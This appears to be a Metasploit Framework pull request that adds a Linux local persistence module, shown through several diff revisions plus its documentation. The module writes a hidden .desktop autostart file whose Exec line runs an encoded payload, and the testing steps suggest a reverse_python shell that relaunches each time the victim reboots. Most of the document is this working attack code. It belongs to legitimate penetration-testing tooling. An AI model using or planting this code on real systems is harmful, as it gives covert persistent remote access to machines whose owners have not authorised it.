### PR TITLE
[GSOC] Autostart persistence module

### DIFF
--- a/documentation/modules/exploit/linux/local/autostart_persistence.md
+++ b/documentation/modules/exploit/linux/local/autostart_persistence.md
@@ -1,0 +1,22 @@
+## Autostart persistence
+
+This module persist a payload by creating a `.desktop` entry for Linux desktop targets.
+
+### Testing
+
+1. Exploit a box
+2. `use exploit/linux/local/autostart_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` (for instance), configure the payload as needed
+5. `exploit`
+
+When the victim reboots your payload will be executed!
+
+
+### Options
+
+
+**NAME**
+
+Name of the `.desktop` entry to add, if not specified it will be chosen randomly.
+

--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -4,62 +4,62 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-    Rank = ExcellentRanking
-    
-    include Msf::Post::File
-    include Msf::Post::Unix
-    include Msf::Exploit::FileDropper
-    
-    def initialize(info = {})
-        super(update_info(info,
-            'Name'           => 'Autostart Desktop Item Persistence',
-            'Description'    => %q(
-                This module will create an autostart entry to execute a payload.
-            ),
-            'License'        => MSF_LICENSE,
-            'Author'         => [ 'Eliott Teissonniere' ],
-            'Platform'       => [ 'unix', 'linux' ],
-            'Arch'           => ARCH_CMD,
-            'Payload'        => {
-                'BadChars'   => '#%\n"',
-                'Compat'     => {
-                    'PayloadType'  => 'cmd',
-                    'RequiredCmd'  => 'generic python netcat perl'
-                }
-            },
-            'SessionTypes'   => [ 'shell', 'meterpreter' ],
-            'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
-            'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart
-            'Targets'        => [ ['Automatic', {}] ],
-            'DefaultTarget'  => 0
-        ))
-              
-        register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])
-    end
-    
-    def exploit
-        name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5)
-        vprint_status ("Name is #{name}")
-                         
-        home = cmd_exec('echo ~')
-        
-        path = "#{home}/.config/autostart/#{name}.desktop"
-        print_status("Creating #{path}")
-        
-        print_status('Making sure the autostart directory exists')
-        cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
-        
-        print_status('Uploading autostart file')
-        cmd_exec("rm #{path}")
-        
-        write_file(path, <<~HEREDOC
-            [Desktop Entry]
-            Type=Application
-            Name=#{name}
-            NoDisplay=true
-            Terminal=false
-            Exec=/bin/sh -c "#{payload.encoded}"
-        HEREDOC)
-    end
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Autostart Desktop Item Persistence',
+      'Description'    => %q(
+        This module will create an autostart entry to execute a payload.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Eliott Teissonniere' ],
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => ARCH_CMD,
+      'Payload'        => {
+        'BadChars'   => '#%\n"',
+        'Compat'     => {
+          'PayloadType'  => 'cmd',
+          'RequiredCmd'  => 'generic python netcat perl'
+        }
+      },
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])
+  end
+
+  def exploit
+    name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5)
+    vprint_status ("Name is #{name}")
+
+    home = cmd_exec('echo ~')
+
+    path = "#{home}/.config/autostart/#{name}.desktop"
+    print_status("Creating #{path}")
+
+    print_status('Making sure the autostart directory exists')
+    cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
+
+    print_status('Uploading autostart file')
+    cmd_exec("rm #{path}")
+
+    write_file(path, <<~HEREDOC
+      [Desktop Entry]
+      Type=Application
+      Name=#{name}
+      NoDisplay=true
+      Terminal=false
+      Exec=/bin/sh -c "#{payload.encoded}"
+    HEREDOC)
+  end
 end
 

--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -41,8 +41,6 @@ class MetasploitModule < Msf::Exploit::Local
         name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5)
         vprint_status ("Name is #{name}")
                          
-        vprint_status payload.encoded
-        
         home = cmd_exec('echo ~')
         
         path = "#{home}/.config/autostart/#{name}.desktop"

--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -52,14 +52,14 @@ class MetasploitModule < Msf::Exploit::Local
     print_status('Uploading autostart file')
     cmd_exec("rm #{path}")
 
-    write_file(path, <<~HEREDOC
-      [Desktop Entry]
-      Type=Application
-      Name=#{name}
-      NoDisplay=true
-      Terminal=false
-      Exec=/bin/sh -c "#{payload.encoded}"
-    HEREDOC)
+    write_file(path, [
+      "[Desktop Entry]",
+      "Type=Application",
+      "Name=#{name}",
+      "NoDisplay=true",
+      "Terminal=false",
+      "Exec=/bin/sh -c \"#{payload.encoded}\""
+    ].join("\n"))
   end
 end
 

--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -1,0 +1,60 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+    Rank = ExcellentRanking
+    
+    include Msf::Post::File
+    include Msf::Post::Unix
+    include Msf::Exploit::FileDropper
+    
+    def initialize(info = {})
+        super(update_info(info,
+            'Name'           => 'Autostart Desktop Item Persistence',
+            'Description'    => %q(
+                This module will create an autostart entry to execute a payload.
+            ),
+            'License'        => MSF_LICENSE,
+            'Author'         => [ 'Eliott Teissonniere' ],
+            'Platform'       => [ 'unix', 'linux' ],
+            'Arch'           => ARCH_CMD,
+            'Payload'        => {
+                'BadChars'   => '#%\n"',
+                'Compat'     => {
+                    'PayloadType'  => 'cmd',
+                    'RequiredCmd'  => 'generic python netcat'
+                }
+            },
+            'SessionTypes'   => [ 'shell', 'meterpreter' ],
+            'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+            'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart
+            'Targets'        => [ ['Automatic', {}] ],
+            'DefaultTarget'  => 0
+        ))
+              
+        register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])
+    end
+    
+    def exploit
+        name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5)
+        vprint_status ("Name is #{name}")
+                         
+        vprint_status payload.encoded
+        
+        home = cmd_exec('echo ~')
+        
+        path = "#{home}/.config/autostart/#{name}.desktop"
+        print_status("Creating #{path}")
+        
+        print_status('Making sure the autostart directory exists')
+        cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
+        
+        print_status('Uploading autostart file')
+        cmd_exec("rm #{path}")
+        
+        write_file(path, "[Desktop Entry]\nType=Application\nName=#{name}\nNoDisplay=true\nTerminal=false\nExec=/bin/sh -c \"#{payload.encoded}\"\n")
+    end
+end
+

--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -52,7 +52,14 @@ class MetasploitModule < Msf::Exploit::Local
         print_status('Uploading autostart file')
         cmd_exec("rm #{path}")
         
-        write_file(path, "[Desktop Entry]\nType=Application\nName=#{name}\nNoDisplay=true\nTerminal=false\nExec=/bin/sh -c \"#{payload.encoded}\"\n")
+        write_file(path, <<~HEREDOC
+            [Desktop Entry]
+            Type=Application
+            Name=#{name}
+            NoDisplay=true
+            Terminal=false
+            Exec=/bin/sh -c "#{payload.encoded}"
+        HEREDOC)
     end
 end
 

--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -39,18 +39,15 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5)
-    vprint_status ("Name is #{name}")
 
     home = cmd_exec('echo ~')
 
     path = "#{home}/.config/autostart/#{name}.desktop"
-    print_status("Creating #{path}")
 
     print_status('Making sure the autostart directory exists')
     cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
 
-    print_status('Uploading autostart file')
-    cmd_exec("rm #{path}")
+    print_status("Uploading autostart file #{path}")
 
     write_file(path, [
       "[Desktop Entry]",

--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local
                 'BadChars'   => '#%\n"',
                 'Compat'     => {
                     'PayloadType'  => 'cmd',
-                    'RequiredCmd'  => 'generic python netcat'
+                    'RequiredCmd'  => 'generic python netcat perl'
                 }
             },
             'SessionTypes'   => [ 'shell', 'meterpreter' ],

--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5)
+    name = datastore['NAME'] || Rex::Text.rand_text_alpha(5)
 
     home = cmd_exec('echo ~')
 


### PR DESCRIPTION
Add a `linux/local` exploit to persist a `cmd` payload on the target by adding a `.desktop` file.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a session
- [ ] `use exploit/linux/local/autostart_persistence`
- [ ] `set SESSION <id>`
- [ ] `set PAYLOAD cmd/unix/reverse_python`, configure the payload as needed
- [ ] `exploit`
- [ ] When rebooting, the payload should be triggered
- [ ] If you install the `dex` tool you can also simply run `dex -a`, this greatly helped me during debugging!

> Huge thanks to @bcoles and my mentors who helped with a huge patience to get that working!

> TLDR: the `Hidden=true` in the autostart specification directive is misleading, it doesn't hide the `.desktop` entry but disables it